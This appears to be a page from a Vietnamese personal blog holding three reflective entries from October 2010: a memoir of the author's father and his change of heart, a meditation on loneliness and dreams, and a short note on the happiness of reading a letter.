Tôi khi đó hành xử theo những cơn nóng giận của cảm xúc, của bản thân. Tôi từng lén xé bỏ đơn li hôn của ba mẹ tôi, cũng có lần khuyên mẹ nên nộp đơn ra tòa, vì như thế là giải thoát. Có một lần như thế, khi tôi in cái bảng bán nhà cho mẹ tôi, và tự mình ra dán ngay trước cửa nhà, ba tôi đi đâu về, thấy, ông lẳng lặng xé nó ra, và ngồi ngay cầu thang. Tôi khi đó chả thiết gì nữa rồi, tôi cũng chỉ ngồi lẳng lặng đó xem ông làm gì. Ai ngờ, nơi cái góc cầu thang tối om, ừ, đó vẫn là kí ức hằn sâu trong tôi, tôi thấy ông khóc. Ông bảo tôi rằng: ba biết con hận ba lắm, nhưng ba lúc nào cũng là ba của con, phải không? và ông tiếp tục: ba không biết, là ba không tốt, ba sợ sau này khi con quen ai đó, gia đình người ta nhìn vào nhà mình thấy ba không tốt, sẽ không cho con quen con gái người ta. Lúc đó, tôi chết lặng, đúng nghĩa của từ đó, tôi chỉ muốn chạy tới ôm chặt ông, nhưng cái tính ích kỉ quá trẻ con của mình khiến tôi chỉ đứng đó, chăm chăm nhìn ông…

Sau đó, đột ngột một buổi sáng ông thức dậy, ông quyết định thay đổi. Ông là một trong những người mà tôi thấy khó hiểu nhất. Ông bướng bỉnh không chịu thay đổi, ngay cả khi có thể vì sự bướng bỉnh đó mà ông mất cả gia đình ông yêu thương nhất, thứ quý giá duy nhất của cuộc đời ông. Và rồi, ông lại đột ngột trở thành một người khác hẳn. Ông bỏ rượu, bỏ thuốc lá ngay lập tức, không có triệu chứng vất vả gì. Rồi ông hằng ngày thức dậy lúc 4h sáng để đi nhà thờ. Dù là muộn màng, nhưng ơn trời, lòng ông rốt cuộc cũng được bình an. Ông hay bảo đó là do bà nội tôi ở Thiên Đàng hằng ngày cầu nguyện cho ông.

Tôi học được từ cái cách tôi nhìn ông qua năm tháng rất rất nhiều điều, và tôi đang làm rất tốt. Tôi học những bài học để trở thành một tôi như hiện tại qua những trải nghiệm đích thực như thế. Tôi chưa bao giờ để mình thật sự say mất kiểm soát. Cả cuộc đời tôi từ đó tới giờ, tôi có thể tự hào nói rằng tôi hầu như chưa từng nóng giận. Tôi lì lợm theo cách mà đôi khi tôi cũng ngạc nhiên, tôi gai góc, tôi phớt đời, và tôi cũng rất đa cảm, rất yếu đuối.

Những điều tốt đẹp của cuộc đời, dạy ta theo một cách, và những mất mát, những kí ức buồn đau, lại làm công việc của nó theo một hướng khác, và phải chăng chính chúng mới tạo nên một chúng ta như hiện tại?

Ba tôi thay đổi nhiều kể từ ngày ấy, ông vui vẻ cả ngày, không còn cái bất mãn với cuộc đời thường thấy. Tuy ông không thể cùng tôi học như những ngày còn nhỏ, nhưng ông vẫn theo dõi từng bước tôi đi. Ông không bao giờ hỏi tôi về những cô gái mà tôi đang quen, nhưng ông biết rõ về họ.

Những kỉ niệm không vui của tôi về ba, giờ được thay thế bằng tiếng cười của ông những lúc ông cùng tôi chơi game. Ông chơi một trò chơi với tôi, đến mức nhiều lúc tôi đang ngồi tán gái trong game, còn bị bạn tôi bảo: thằng Cún xê ra để ta nói chuyện với bác xem nào. Những lúc như thế tôi thấy tôi và ông thật gần gũi (dù đôi khi ông hay mắng tôi vì tôi quen những đứa con gái “không ra gì”).

***

Cuộc sống ở Việt Nam rất nhàn hạ, dư ăn dư mặc, nhưng như một lần nữa, ba vẫn quyết định bỏ tất cả để qua Mỹ, vẫn với câu quen thuộc: nơi đó tốt cho con và em hơn. Qua đây, tôi đi cùng ông tới từng garage sửa xe, từng tiệm mộc, từng chợ người Việt… để hỏi người ta việc cho ông. Khi tôi chưa biết lái xe, ông chở tôi đi tới từng nơi, từng nơi để phỏng vấn, mỉm cười khi tôi bước ra khỏi công ty, an ủi tôi khi biết tôi bị họ từ chối.

Một lần tôi có cuộc phỏng vấn dài hơn ba giờ đồng hồ, khi tôi bước chân ra khỏi cửa công ty, thì thấy ông đang ngồi bên gốc cây chờ tôi. Mười năm trước, vẫn là hình ảnh đó, mười năm sau, vẫn là hình ảnh đó. Tôi biết rằng, tình yêu và niềm hi vọng của ông về tôi, sẽ theo tôi cả đời.

Ngày tôi được nhận đi làm trên Dallas, ông vào sở làm và khoe với tất cả mọi người. Khi tôi nghe mẹ tôi kể lại, tuy không ở đó, nhưng tôi vẫn cảm nhận được ông vui thế nào.

Tôi đi làm, ngày ngày vẫn nói chuyện với mẹ, vẫn chat trên YM với em gái tôi, nhưng chưa từng nói chuyện gì với ông, trừ những lần liên quan đến việc nhà này nọ. Tôi không coi đó là xa cách, giao tiếp không phải là cách duy nhất mà hai người đàn ông có thể dùng để hiểu nhau.

***

Mẹ gọi tôi, mẹ nói tôi rằng ba dạo này yếu lắm, nhưng mẹ nói ba mua bảo hiểm sức khỏe, ba không mua, vì nó mắc quá. Mẹ nhờ tôi khuyên ba. Đến lúc này, tôi mới thực sự nhận ra ba tôi đã lớn tuổi thế nào, và tôi thật sự đang thay thế ông trở thành trụ cột của gia đình ra sao.

Những đoạn kí ức đó vẫn còn, nhưng cách nghĩ của một thằng nhóc 16 tuổi không còn. Tôi chỉ còn kính trọng ba, và rất thương ông. Như lúc ấy tôi đang chạy xe, giọng mẹ nhỏ nhẹ vì sợ ba nghe thấy, nói tôi về tình hình sức khỏe của ông, tới những chữ “ba dạo này yếu lắm”, tôi buồn, rất buồn…

25102010,
B.l.u.e.

tôi đang mơ giấc mộng dài

Tối Chủ Nhật, ngủ một giấc tới trưa, rồi xuống nhà nằm đọc gì đó và xem gì đó, những thứ mà đến giờ mình chẳng còn chút ý thức đọng lại xem nó là gì. Chiều mới lồm cồm bò dậy, mò đi ăn, về nhà rồi lại ngủ một giấc tới tối khuya, đói quá lái xe đi mua sandwich ăn.

Trên con đường ngắn ngủi chạy tới Subway, ngồi nghe vài bài nhạc vu vơ. Và đột nhiên, thấy buồn, buồn ghê gớm.

Như là lúc hôm qua, đứng giữa hàng chục người Mỹ bự, cụng beer với họ cả buổi, và đột nhiên ngẩn người ra, mình đang đứng nơi đâu và làm gì thế này, những thứ thế này có ý nghĩa gì với cuộc đời của mình?
Hay lại cũng như là lúc hôm qua, giữa hơn bốn chục ngàn người gào thét vang dội nơi sân vận động, đột nhiên ngồi lặng lại, những thứ này là gì, tại sao nó lại quá khác biệt so với cuộc sống thật của mình. Ừ, rồi lại nhận ra, đây mới là cuộc sống thật của mình, cuộc sống mà mình đang sống.

Còn tối nay, khi tỉnh giấc, xung quanh là một màu đen tĩnh lặng, trong đầu mình không còn tồn tại khái niệm gì về không gian và thời gian, cứ nằm đó và tự hỏi: cái thằng đang nằm đây và đang tự hỏi phải là mình không?

Đột nhiên, bùng dậy trong đầu một nỗi bực tức, một cơn giận khôn tả, kiểu như tại sao tôi-lại-đang-là-tôi-như-thế-này?

và rồi, thấy cô đơn và buồn kinh khủng…

Cứ như đang mơ những giấc mộng dài, những giấc mơ màu sắc và sự kiện hỗn loạn. Mà biết đâu, cuộc đời thực đang tiếp diễn này của mình, lại đang là trong một giấc mơ ngắn của một ai đó. Đột nhiên muốn xem Inception quá, nghe bảo nó giải thích được cái gì thực và mộng. Mà thôi, có là mơ hay thực, cũng thế mà thôi.

Tôi đang mơ giấc mộng dài
Đừng lay tôi nhé, cuộc đời chung quanh
(Phạm Duy)

24102010,
B.l.u.e.

tôi ngồi đọc thư em…

Tặng Hiệp của anh

Cả tuần công việc và việc học bận rộn, mệt mỏi, ngày nào cũng đến tối mịt mới lết xác về nhà. Chính vì thế, như bao nhiêu người khác, tôi rất thích cuối tuần.

Như hôm nay là Chủ Nhật chẳng hạn, tôi nằm dài trên giường đến tận 1h trưa, cho đến khi mẹ gọi điện và cằn nhằn, mới lết xác xuống nhà. Khi xuống dưới nhà, lại ngồi chơi Modern Warfare trên XBox 360 tới 3h chiều mới lái xe đi mua gì đó ăn tạm.

Khi lái xe qua cái hộp thư đặt trước nhà, tôi nhận được thư em.

Tôi đang sống một cuộc sống rất vui vẻ. Tôi vui mỗi khi mẹ gọi điện hỏi thăm. Tôi vui khi hai bé Trung Quốc chung nhóm sau khi để tôi làm hết bài đồ án, mới nói cám ơn, và: không có cậu thì bọn mình chả biết gì. Tôi vui mỗi tháng hai lần nhận cái pay check ở công ty.

Hay như hôm nay, một chủ nhật đẹp trời, trong căn phòng, các sửa sổ kéo rèm lên hết, trên cái nệm vàng ươm màu nắng, tôi ngồi đọc thư em, và… mỉm cười vì hạnh phúc.

Hanh phúc thật giản đơn….

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.